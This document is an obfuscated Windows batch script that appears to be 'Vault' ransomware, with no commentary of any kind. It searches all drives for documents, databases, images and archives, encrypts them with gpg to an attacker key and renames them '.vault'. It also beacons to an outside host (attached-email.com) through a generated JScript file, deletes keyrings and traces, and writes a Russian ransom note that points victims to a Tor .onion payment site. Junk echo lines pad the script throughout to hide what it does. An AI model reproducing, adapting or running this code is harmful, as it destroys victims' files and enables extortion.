echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
echo set ntries=^0>> "%temp%\69aca909.cmd"
echo :3c843d11>> "%temp%\69aca909.cmd"
echo wscript.exe //B //Nologo "%%temp%%\59665d79.vbs"^& tasklist^|findstr /i wmic.exe>> "%temp%\69aca909.cmd"
echo if not ^^!errorlevel^^!==0 ^(>> "%temp%\69aca909.cmd"
echo swETEcHukuSpaj7q2CAQu8ESa3rUzaq3 >nul
echo dA8ruKA4EsePr4PHaYUWrUStaV2pahe3 >nul
echo set /a ntries+=^1>> "%temp%\69aca909.cmd"
echo if not ^^!ntries^^! GEQ 16 goto 3c843d11>> "%temp%\69aca909.cmd"
echo ^)>> "%temp%\69aca909.cmd"
echo swETEcHukuSpaj7q2CAQu8ESa3rUzaq3 >nul
echo dA8ruKA4EsePr4PHaYUWrUStaV2pahe3 >nul
echo :a3811a18>> "%temp%\69aca909.cmd"
echo del /f /q "%temp%\acda3f33.js">> "%temp%\69aca909.cmd"
echo del /f /q "%temp%\59665d79.vbs">> "%temp%\69aca909.cmd"
echo swETEcHukuSpaj7q2CAQu8ESa3rUzaq3 >nul
echo dA8ruKA4EsePr4PHaYUWrUStaV2pahe3 >nul
echo echo del /f /q "%temp%\59665d79.vbs">> "%temp%\69aca909.cmd"
echo echo 1107cc4c ^> "%%temp%%\69aca909.cmd">> "%temp%\69aca909.cmd"
start wscript.exe //B //Nologo "%temp%\acda3f33.js"
echo swETEcHukuSpaj7q2CAQu8ESa3rUzaq3 >nul
echo dA8ruKA4EsePr4PHaYUWrUStaV2pahe3 >nul
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :c68cd952 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 02FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
goto 9b100e11
echo swETEcHukuSpaj7q2CAQu8ESa3rUzaq3 >nul
echo dA8ruKA4EsePr4PHaYUWrUStaV2pahe3 >nul
:c68cd952
dir /B "%1:\"&& for /r "%1:\" %%i in (*.pdf *.rtf) do (
echo "%%TeMp%%\gpg.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\61231f25.9db8b89a"
echo %%i>> "%temp%\21b0fb7b.7ca0ec0c"
)
goto:eof
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
:9b100e11
echo x5fawEmawuZA7pu7amES7uZUdega7u6E >nul
echo daprE8ESWUDaja3hUprawrUyaSEbEBe4 >nul
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :a556dfcb %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 03FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
goto cd9f3e2a

echo x5fawEmawuZA7pu7amES7uZUdega7u6E >nul
echo daprE8ESWUDaja3hUprawrUyaSEbEBe4 >nul
:a556dfcb
dir /B "%1:\"&& for /r "%1:\" %%i in (*.psd *.dwg *.cdr) do (
echo "%%TeMp%%\gpg.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\61231f25.9db8b89a"
echo %%i>> "%temp%\21b0fb7b.7ca0ec0c"
)
goto:eof
:cd9f3e2a
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :071faa5e %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 04FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
goto e0aede1c
:071faa5e
dir /B "%1:\"&& for /r "%1:\" %%i in (*.cd *.mdb *.1cd *.dbf *.sqlite) do (
echo "%%TeMp%%\gpg.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\61231f25.9db8b89a"
echo %%i>> "%temp%\21b0fb7b.7ca0ec0c"
)
goto:eof
:e0aede1c
FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :f941ecc1 %%s
echo if exist "%%TeMp%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 05FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
goto ca70214e
:f941ecc1
dir /B "%1:\"&& for /r "%1:\" %%i in (*.jpg *.zip) do (
echo "%%TeMp%%\gpg.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\61231f25.9db8b89a"
echo %%i>> "%temp%\21b0fb7b.7ca0ec0c"
)
goto:eof
:ca70214e
set loco=!random!!random!
echo x5fawEmawuZA7pu7amES7uZUdega7u6E >nul
echo daprE8ESWUDaja3hUprawrUyaSEbEBe4 >nul
echo function CreateObject^(b^){return new ActiveXObject^(b^)} >> !loco!.js
echo ahdkUAHFahjdkuhjau82uhdADUKshd7rq >nul
echo prEMayafRuDubrug3fRUmEChubrustuy >nul
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
echo frEchUS3eSwEB6espeb4kEXuc2EChAsp >nul
echo function ok^(b^){var c=new ActiveXObject^("MSXML2.XMLHTTP"^);c.open^("GET",b,0^);c.send^(^)} >> !loco!.js
echo ahdkUAHFahjdkuhjau82uhdADUKshd7rq >nul
echo prEMayafRuDubrug3fRUmEChubrustuy >nul
echo frEchUS3eSwEB6espeb4kEXuc2EChAsp >nul
echo ok^("http://attached-email.com/c1.php"^); >> !loco!.js
echo ahdkUAHFahjdkuhjau82uhdADUKshd7rq >nul
echo prEMayafRuDubrug3fRUmEChubrustuy >nul
echo frEchUS3eSwEB6espeb4kEXuc2EChAsp >nul
wscript.exe //B //nologo //T:40 "!loco!.js"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
echo echo FHASH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo echo FHASH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
echo echo FHASH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo echo 1e759748 ^> "%%TeMp%%\4c2e533d.cmd">> "%temp%\61231f25.9db8b89a"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
echo del /f /q "%%TeMp%%\4c2e533d.cmd">> "%temp%\61231f25.9db8b89a"
findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\21b0fb7b.7ca0ec0c"> "%temp%\97cf86b0.e479bce7"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\61231f25.9db8b89a"> "%temp%\f2a431bc.6ccc04ec"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\97cf86b0.e479bce7"> "%temp%\8f9c3dbb.9767d548"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\f2a431bc.6ccc04ec"> "%temp%\4c2e533d.cmd"
del /f /q "%temp%\97cf86b0.e479bce7"
del /f /q "%temp%\f2a431bc.6ccc04ec"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
del /f /q "%temp%\21b0fb7b.7ca0ec0c"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
del /f /q "%temp%\61231f25.9db8b89a"
echo XCONF: !58d179b8!>> "%temp%\3637bf69.36ddf8fe"
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
set 3a3b7af1=66668
for /f %%f in ('find /c /v ""^< "%temp%\8f9c3dbb.9767d548"') do (
set 3a3b7af1=%%f
)
echo swuQAtapas74dABrupRAk4geCrU4aSuC >nul
echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
echo speFrez4chE3asw4RebrU32haGedaDAD >nul
echo QNTTY: !3a3b7af1!>> "%temp%\3637bf69.36ddf8fe"
for %%c IN (01:xls 04:doc 05:rtf 10:pdf 11:psd 12:dwg 13:cdr 19:cd 20:mdb 21:1cd 23:dbf 24:sqlite 26:jpg 27:zip) do (
for /f "tokens=1,2 delims=:" %%i in ("%%c") do (
for /f %%b in ('find /c /i ".%%j"^< "%temp%\8f9c3dbb.9767d548"') do (
echo %%iEXT: %%b>> "%temp%\3637bf69.36ddf8fe"
)))
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
echo 02EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 03EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
echo 06EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 07EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 08EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 09EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
echo 14EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 15EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 16EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
echo 17EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 18EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 22EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
echo 25EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo 28EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
echo 29EXT: 0 >> "%temp%\3637bf69.36ddf8fe"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
echo.>> "%temp%\8f9c3dbb.9767d548"
echo XCONF: !58d179b8!>> "%temp%\8f9c3dbb.9767d548"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
del /f /q "!loco!.js"
"%temp%\gpg.exe" --import "%temp%\03dfb98e.7087b06e"
del /f /q "%temp%\03dfb98e.7087b06e"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
"%temp%\gpg.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\VAULT.KEY" -e "%temp%\3637bf69.36ddf8fe"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
"%temp%\gpg.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\CONFIRMATION.KEY" -e "%temp%\8f9c3dbb.9767d548"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
if not exist "%temp%\VAULT.KEY" (
"%temp%\gpg.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\3637bf69.36ddf8fe"
echo thu83E7r88Erup7etUbRuzaqathUchaB >nul
echo NateBRaCu2ruphEbruPhATHeRAMe6rab >nul
echo sTEhet8TAveg2cek8neCuH3cR4f5xu3r >nul
RENAME "%temp%\3637bf69.36ddf8fe.gpg" VAULT.KEY
)
if not exist "%temp%\CONFIRMATION.KEY" (
"%temp%\gpg.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\8f9c3dbb.9767d548"
RENAME "%temp%\8f9c3dbb.9767d548.gpg" CONFIRMATION.KEY
echo spewuxeJubrupruthUmex33EpafrAbre >nul
echo T8eQewUvebR4fraThaKu2uqase85xe8u >nul
echo wrasatuNabrefr8stubruxuhAreCHapr >nul
)
if not exist "%temp%\VAULT.KEY" (
del /f /q "%temp%\*.vlt"
del /f /q "%temp%\*.gpg"
echo spewuxeJubrupruthUmex33EpafrAbre >nul
echo T8eQewUvebR4fraThaKu2uqase85xe8u >nul
echo wrasatuNabrefr8stubruxuhAreCHapr >nul
del /f /q "%temp%\random_seed"
del /f /q "%temp%\*.lock"
echo spewuxeJubrupruthUmex33EpafrAbre >nul
echo T8eQewUvebR4fraThaKu2uqase85xe8u >nul
echo wrasatuNabrefr8stubruxuhAreCHapr >nul
del /f /q "%temp%\*.bak"
del /f /q "%temp%\*.list"
echo spewuxeJubrupruthUmex33EpafrAbre >nul
echo T8eQewUvebR4fraThaKu2uqase85xe8u >nul
echo wrasatuNabrefr8stubruxuhAreCHapr >nul
goto 6d0f24b8
)
echo.>> "%temp%\VAULT.KEY"
echo 01FNSH-!715c7be3!>> "%temp%\VAULT.KEY"
echo 2hUwaJe7enacePrek25payEneteyuThU >nul
echo yu8avat34jeq4vapr3JUceC3uquvethe >nul
echo 02FNSH-!b67b5d00!>> "%temp%\VAULT.KEY"
echo 2hUwaJe7enacePrek25payEneteyuThU >nul
echo yu8avat34jeq4vapr3JUceC3uquvethe >nul
echo 03FNSH-!db5a2d8a!>> "%temp%\VAULT.KEY"
echo 04FNSH-!dc841a88!>> "%temp%\VAULT.KEY"
echo 2hUwaJe7enacePrek25payEneteyuThU >nul
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
echo yu8avat34jeq4vapr3JUceC3uquvethe >nul
echo 05FNSH-!ee1f189d!>> "%temp%\VAULT.KEY"
echo FHASH-!2162ea2b!>> "%temp%\VAULT.KEY"
echo 2hUwaJe7enacePrek25payEneteyuThU >nul
echo yu8avat34jeq4vapr3JUceC3uquvethe >nul

echo 77406a1e885873e930cb056a91c09c60 25ca7a7cd21f132ab320494e> "%temp%\secring.qpq"
echo 2hUwaJe7enacePrek25payEneteyuThU >nul
echo yu8avat34jeq4vapr3JUceC3uquvethe >nul
echo 9767d5483a3b7af1 6d0f24b86d997bc025ca7a7c7bff218e4077430c>> "%temp%\secring.qpq"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
echo 9767d548 3a3b7af16d0f24b8 6d997bc025ca7a7c 7bff218e4077430c>> "%temp%\secring.qpq"
echo 59665d79acda3f3369aca9093c843d11 a3811a181107cc4cc68cd952>> "%temp%\secring.qpq"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
echo 071faa5ef941ecc1 ca70214e1e7597484c2e533d97cf86b0e479bce7>> "%temp%\secring.qpq"
echo acda3f33 ca70214e 91c09c6030cb056a cb2f4cf2 7bff218e4077430c>> "%temp%\secring.qpq"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
move /y "%temp%\secring.qpq" "%temp%\secring.gpg"
echo 9767d548 3a3b7af16d0f24b8 6d997bc025ca7a7c 7bff218e4077430c> "%temp%\36ddf8fe3637bf69.qpq"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
echo 071faa5ef941ecc1 ca70214e1e7597484c2e533d97cf86b0e479bce7>> "%temp%\36ddf8fe3637bf69.qpq"
echo 59665d79acda3f3369aca9093c843d11 a3811a181107cc4cc68cd952>> "%temp%\36ddf8fe3637bf69.qpq"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
echo 071faa5ef941ecc1 ca70214e1e7597484c2e533d97cf86b0e479bce7>> "%temp%\36ddf8fe3637bf69.qpq"
echo acda3f33 ca70214e 91c09c6030cb056a cb2f4cf2 7bff218e4077430c>> "%temp%\36ddf8fe3637bf69.qpq"
echo 59665d79acda3f3369aca9093c843d11 a3811a181107cc4cc68cd952>> "%temp%\36ddf8fe3637bf69.qpq"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
echo 77406a1e885873e930cb056a91c09c60 25ca7a7cd21f132ab320494e>> "%temp%\36ddf8fe3637bf69.qpq"
echo 9767d5483a3b7af1 6d0f24b86d997bc025ca7a7c7bff218e4077430c>> "%temp%\36ddf8fe3637bf69.qpq"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
move /y "%temp%\36ddf8fe3637bf69.qpq" "%temp%\3637bf69.36ddf8fe"
echo 59665d79acda3f3369aca9093c843d11 a3811a181107cc4cc68cd952> "%temp%\9767d5488f9c3dbb.qpq"
echo 9767d5483a3b7af1 6d0f24b86d997bc025ca7a7c7bff218e4077430c>> "%temp%\9767d5488f9c3dbb.qpq"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
echo 77406a1e885873e930cb056a91c09c60 25ca7a7cd21f132ab320494e>> "%temp%\9767d5488f9c3dbb.qpq"
move /y "%temp%\9767d5488f9c3dbb.qpq" "%temp%\8f9c3dbb.9767d548"
del /f /q "%temp%\secring.gpg"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
del /f /q "%temp%\3637bf69.36ddf8fe"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
del /f /q "%temp%\8f9c3dbb.9767d548"
del /f /q "%temp%\21b0fb7b.7ca0ec0c"
del /f /q "%temp%\random_seed"
del /f /q "%temp%\trustdb.gpg"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
del /f /q "%temp%\secring.gpg"
del /f /q "%temp%\*.lock"
del /f /q "%temp%\*.bak"
attrib -s -h -r "%AppData%\gnupg\*.*"
attrib -s -h -r "%AppData%\gnupg"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
del /f /q "%AppData%\gnupg\*.*"
rmdir /s /q "%AppData%\gnupg"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
copy /y "%temp%\CONFIRMATION.KEY" "%appdata%\CONFIRMATION.KEY"
copy /y "%temp%\VAULT.KEY" "%appdata%\VAULT.KEY"
echo jePHAHasweN4z3be26ejusWeQeQufRa4 >nul
echo 8ExA3rE6asasaxaZa4a2ezeQewe8rusa >nul
copy /y "%temp%\VAULT.KEY" "%temp%\4077430c_VAULT.KEY"
echo 01FNSH-OK>> "%temp%\4077430c_VAULT.KEY"
echo 02FNSH-OK>> "%temp%\4077430c_VAULT.KEY"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo 03FNSH-OK>> "%temp%\4077430c_VAULT.KEY"
echo 04FNSH-OK>> "%temp%\4077430c_VAULT.KEY"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo 05FNSH-OK>> "%temp%\4077430c_VAULT.KEY"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo FHASH-OK>> "%temp%\4077430c_VAULT.KEY"
attrib +r "%temp%\4077430c_VAULT.KEY"
copy /y "%temp%\VAULT.KEY" "%userprofile%\Desktop\VAULT.KEY"
echo.> "%temp%\VAULT.txt"
echo Ваши рабочие документы и базы данных были заблокированы и помечены форматом .vаult >> "%temp%\VAULT.txt"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul

echo CNKM5uZisBFr8E8ZvA92aYEyCErjpEnbT3MtueqFD3AJPcEcrb
echo RobfE3bEJP9vMkgaekFEjsqvlEaHscq14JcFSZlrQyjrKNyTge
echo Для их восстановления необходимо получить уникальный ключ>> "%temp%\VAULT.txt"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo.>> "%temp%\VAULT.txt"
echo ПРОЦЕДУРА ПОЛУЧЕНИЯ КЛЮЧА: >> "%temp%\VAULT.txt"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo.>> "%temp%\VAULT.txt"
echo КРАТКО>> "%temp%\VAULT.txt"
echo 1. Перейдите на наш веб-ресурс>> "%temp%\VAULT.txt"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo 2. Гарантированно получите Ваш ключ>> "%temp%\VAULT.txt"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo 3. Восстановите файлы в прежний вид>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo ДЕТАЛЬНО>> "%temp%\VAULT.txt"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo Шаг 1:>> "%temp%\VAULT.txt"
echo Скачайте Tor браузер с официального сайта: http://torproject.org>> "%temp%\VAULT.txt"
echo ChAwuchep3EdRetR7CHUkebrUfRat5cu >nul
echo zuphuru3T7w4amEdr8wuzu3ucEfuvupr >nul
echo bUbad3evac2ecRePUKAmebr77uCUG2br >nul
echo Шаг 2:>> "%temp%\VAULT.txt"
echo Используя Tor браузер посетите сайт: http://restoredz4xpmuqr.onion>> "%temp%\VAULT.txt"
echo Шаг 3:>> "%temp%\VAULT.txt"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
echo Найдите Ваш уникальный VAULT.KEY на компьютере - это Ваш ключ к личной клиент-панели. Не удалите его>> "%temp%\VAULT.txt"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
echo Авторизируйтесь на сайте используя ключ VAULT.KEY>> "%temp%\VAULT.txt"
echo Перейдите в раздел FAQ и ознакомьтесь с дальнейшей процедурой>> "%temp%\VAULT.txt"
echo STEP 4:>> "%temp%\VAULT.txt"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
